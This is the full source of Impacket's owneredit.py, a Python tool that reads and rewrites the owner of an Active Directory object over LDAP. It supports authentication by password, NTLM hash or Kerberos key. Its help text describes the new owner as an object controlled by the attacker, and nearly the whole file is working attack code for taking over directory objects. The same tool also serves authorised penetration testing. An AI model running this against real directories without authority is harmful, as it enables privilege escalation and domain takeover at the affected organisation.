1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
|
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright Fortra, LLC and its affiliated companies
#
# All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Python script for reading and modifying the Owner attribute (OwnerSid) of an Active Directory object.
#
# Authors:
# Charlie BROMBERG (@_nwodtuhs)
import argparse
import logging
import sys
import traceback
import ldap3
import ldapdomaindump
from ldap3.protocol.formatters.formatters import format_sid
from impacket import version
from impacket.examples import logger, utils
from impacket.ldap import ldaptypes
from ldap3.utils.conv import escape_filter_chars
from ldap3.protocol.microsoft import security_descriptor_control
from impacket.examples.utils import init_ldap_session, parse_identity
# Universal SIDs
WELL_KNOWN_SIDS = {
'S-1-0': 'Null Authority',
'S-1-0-0': 'Nobody',
'S-1-1': 'World Authority',
'S-1-1-0': 'Everyone',
'S-1-2': 'Local Authority',
'S-1-2-0': 'Local',
'S-1-2-1': 'Console Logon',
'S-1-3': 'Creator Authority',
'S-1-3-0': 'Creator Owner',
'S-1-3-1': 'Creator Group',
'S-1-3-2': 'Creator Owner Server',
'S-1-3-3': 'Creator Group Server',
'S-1-3-4': 'Owner Rights',
'S-1-5-80-0': 'All Services',
'S-1-4': 'Non-unique Authority',
'S-1-5': 'NT Authority',
'S-1-5-1': 'Dialup',
'S-1-5-2': 'Network',
'S-1-5-3': 'Batch',
'S-1-5-4': 'Interactive',
'S-1-5-6': 'Service',
'S-1-5-7': 'Anonymous',
'S-1-5-8': 'Proxy',
'S-1-5-9': 'Enterprise Domain Controllers',
'S-1-5-10': 'Principal Self',
'S-1-5-11': 'Authenticated Users',
'S-1-5-12': 'Restricted Code',
'S-1-5-13': 'Terminal Server Users',
'S-1-5-14': 'Remote Interactive Logon',
'S-1-5-15': 'This Organization',
'S-1-5-17': 'This Organization',
'S-1-5-18': 'Local System',
'S-1-5-19': 'NT Authority',
'S-1-5-20': 'NT Authority',
'S-1-5-32-544': 'Administrators',
'S-1-5-32-545': 'Users',
'S-1-5-32-546': 'Guests',
'S-1-5-32-547': 'Power Users',
'S-1-5-32-548': 'Account Operators',
'S-1-5-32-549': 'Server Operators',
'S-1-5-32-550': 'Print Operators',
'S-1-5-32-551': 'Backup Operators',
'S-1-5-32-552': 'Replicators',
'S-1-5-64-10': 'NTLM Authentication',
'S-1-5-64-14': 'SChannel Authentication',
'S-1-5-64-21': 'Digest Authority',
'S-1-5-80': 'NT Service',
'S-1-5-83-0': 'NT VIRTUAL MACHINE\\Virtual Machines',
'S-1-16-0': 'Untrusted Mandatory Level',
'S-1-16-4096': 'Low Mandatory Level',
'S-1-16-8192': 'Medium Mandatory Level',
'S-1-16-8448': 'Medium Plus Mandatory Level',
'S-1-16-12288': 'High Mandatory Level',
'S-1-16-16384': 'System Mandatory Level',
'S-1-16-20480': 'Protected Process Mandatory Level',
'S-1-16-28672': 'Secure Process Mandatory Level',
'S-1-5-32-554': 'BUILTIN\\Pre-Windows 2000 Compatible Access',
'S-1-5-32-555': 'BUILTIN\\Remote Desktop Users',
'S-1-5-32-557': 'BUILTIN\\Incoming Forest Trust Builders',
'S-1-5-32-556': 'BUILTIN\\Network Configuration Operators',
'S-1-5-32-558': 'BUILTIN\\Performance Monitor Users',
'S-1-5-32-559': 'BUILTIN\\Performance Log Users',
'S-1-5-32-560': 'BUILTIN\\Windows Authorization Access Group',
'S-1-5-32-561': 'BUILTIN\\Terminal Server License Servers',
'S-1-5-32-562': 'BUILTIN\\Distributed COM Users',
'S-1-5-32-569': 'BUILTIN\\Cryptographic Operators',
'S-1-5-32-573': 'BUILTIN\\Event Log Readers',
'S-1-5-32-574': 'BUILTIN\\Certificate Service DCOM Access',
'S-1-5-32-575': 'BUILTIN\\RDS Remote Access Servers',
'S-1-5-32-576': 'BUILTIN\\RDS Endpoint Servers',
'S-1-5-32-577': 'BUILTIN\\RDS Management Servers',
'S-1-5-32-578': 'BUILTIN\\Hyper-V Administrators',
'S-1-5-32-579': 'BUILTIN\\Access Control Assistance Operators',
'S-1-5-32-580': 'BUILTIN\\Remote Management Users',
}
class OwnerEdit(object):
def __init__(self, ldap_server, ldap_session, args):
super(OwnerEdit, self).__init__()
self.ldap_server = ldap_server
self.ldap_session = ldap_session
self.target_sAMAccountName = args.target_sAMAccountName
self.target_SID = args.target_SID
self.target_DN = args.target_DN
self.new_owner_sAMAccountName = args.new_owner_sAMAccountName
self.new_owner_SID = args.new_owner_SID
self.new_owner_DN = args.new_owner_DN
logging.debug('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)
if self.target_sAMAccountName or self.target_SID or self.target_DN:
# Searching for target account with its security descriptor
self.search_target_principal_security_descriptor()
# Extract security descriptor data
self.target_principal_raw_security_descriptor = self.target_principal['nTSecurityDescriptor'].raw_values[0]
self.target_principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.target_principal_raw_security_descriptor)
# Searching for the owner SID if any owner argument was given and new_owner_SID wasn't
if self.new_owner_SID is None and self.new_owner_sAMAccountName is not None or self.new_owner_DN is not None:
_lookedup_owner = ""
if self.new_owner_sAMAccountName is not None:
_lookedup_owner = self.new_owner_sAMAccountName
self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_owner), attributes=['objectSid'])
elif self.new_owner_DN is not None:
_lookedup_owner = self.new_owner_DN
self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_owner, attributes=['objectSid'])
try:
self.new_owner_SID = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])
logging.debug("Found new owner SID: %s" % self.new_owner_SID)
except IndexError:
logging.error('New owner SID not found in LDAP (%s)' % _lookedup_owner)
exit(1)
def read(self):
current_owner_SID = format_sid(self.target_principal_security_descriptor['OwnerSid']).formatCanonical()
logging.info("Current owner information below")
logging.info("- SID: %s" % current_owner_SID)
logging.info("- sAMAccountName: %s" % self.resolveSID(current_owner_SID))
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % current_owner_SID, attributes=['distinguishedName'])
current_owner_distinguished_name = self.ldap_session.entries[0]
logging.info("- distinguishedName: %s" % current_owner_distinguished_name['distinguishedName'])
def write(self):
logging.debug('Attempt to modify the OwnerSid')
_new_owner_SID = ldaptypes.LDAP_SID()
_new_owner_SID.fromCanonical(self.new_owner_SID)
# lib doesn't set this, but I don't known if it's needed
# _new_owner_SID['SubLen'] = len(_new_owner_SID['SubAuthority'])
self.target_principal_security_descriptor['OwnerSid'] = _new_owner_SID
self.ldap_session.modify(
self.target_principal.entry_dn,
{'nTSecurityDescriptor': (ldap3.MODIFY_REPLACE, [
self.target_principal_security_descriptor.getData()
])},
controls=security_descriptor_control(sdflags=0x01))
if self.ldap_session.result['result'] == 0:
logging.info('OwnerSid modified successfully!')
else:
if self.ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s',
self.ldap_session.result['message'])
elif self.ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s',
self.ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', self.ldap_session.result['message'])
# Attempts to retrieve the Security Descriptor of the specified target
def search_target_principal_security_descriptor(self):
_lookedup_principal = ""
# Set SD flags to only query for OwnerSid
controls = security_descriptor_control(sdflags=0x01)
if self.target_sAMAccountName is not None:
_lookedup_principal = self.target_sAMAccountName
self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['nTSecurityDescriptor'], controls=controls)
elif self.target_SID is not None:
_lookedup_principal = self.target_SID
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)
elif self.target_DN is not None:
_lookedup_principal = self.target_DN
self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls)
try:
self.target_principal = self.ldap_session.entries[0]
logging.debug('Target principal found in LDAP (%s)' % _lookedup_principal)
except IndexError:
logging.error('Target principal not found in LDAP (%s)' % _lookedup_principal)
exit(0)
# Attempts to resolve a SID and return the corresponding samaccountname
def resolveSID(self, sid):
# Tries to resolve the SID from the well known SIDs
if sid in WELL_KNOWN_SIDS.keys() or False:
return WELL_KNOWN_SIDS[sid]
# Tries to resolve the SID from the LDAP domain dump
else:
self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % sid, attributes=['samaccountname'])
try:
dn = self.ldap_session.entries[0].entry_dn
samname = self.ldap_session.entries[0]['samaccountname']
return samname
except IndexError:
logging.debug('SID not found in LDAP: %s' % sid)
return ""
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='Python editor for a principal\'s DACL.')
parser.add_argument('identity', action='store', help='domain.local/username[:password]')
parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
auth_con = parser.add_argument_group('authentication & connection')
auth_con.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
auth_con.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
auth_con.add_argument('-k', action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
auth_con.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
auth_con.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter')
auth_con.add_argument('-dc-host', action='store', metavar="hostname", help='Hostname of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, -dc-ip will be used')
new_owner_parser = parser.add_argument_group("owner", description="Object, controlled by the attacker, to set as owner of the target object")
new_owner_parser.add_argument("-new-owner", dest="new_owner_sAMAccountName", metavar="NAME", type=str, required=False, help="sAMAccountName")
new_owner_parser.add_argument("-new-owner-sid", dest="new_owner_SID", metavar="SID", type=str, required=False, help="Security IDentifier")
new_owner_parser.add_argument("-new-owner-dn", dest="new_owner_DN", metavar="DN", type=str, required=False, help="Distinguished Name")
target_parser = parser.add_argument_group("target", description="Target object to edit the owner of")
target_parser.add_argument("-target", dest="target_sAMAccountName", metavar="NAME", type=str, required=False, help="sAMAccountName")
target_parser.add_argument("-target-sid", dest="target_SID", metavar="SID", type=str, required=False, help="Security IDentifier")
target_parser.add_argument("-target-dn", dest="target_DN", metavar="DN", type=str, required=False, help="Distinguished Name")
dacl_parser = parser.add_argument_group("dacl editor")
dacl_parser.add_argument('-action', choices=['read', 'write'], nargs='?', default='read', help='Action to operate on the owner attribute')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def main():
print(version.BANNER)
args = parse_args()
logger.init(args.ts, args.debug)
if args.action == 'write' and args.new_owner_sAMAccountName is None and args.new_owner_SID is None and args.new_owner_DN is None:
logging.critical('-owner, -owner-sid, or -owner-dn should be specified when using -action write')
sys.exit(1)
if args.action == "restore" and not args.filename:
logging.critical('-file is required when using -action restore')
domain, username, password, lmhash, nthash, args.k = parse_identity(args.identity, args.hashes, args.no_pass, args.aesKey, args.k)
try:
ldap_server, ldap_session = init_ldap_session(domain, username, password, lmhash, nthash, args.k, args.dc_ip, args.dc_host, args.aesKey, args.use_ldaps)
owneredit = OwnerEdit(ldap_server, ldap_session, args)
if args.action == 'read':
owneredit.read()
elif args.action == 'write':
owneredit.read()
owneredit.write()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.error(str(e))
if __name__ == '__main__':
main()
|
